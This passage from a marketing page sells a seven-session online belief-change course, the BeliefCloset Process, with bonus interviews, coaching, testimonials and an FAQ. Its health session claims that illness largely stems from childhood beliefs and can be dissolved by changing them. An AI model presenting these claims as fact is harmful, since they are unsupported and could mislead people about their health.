reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul>\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing 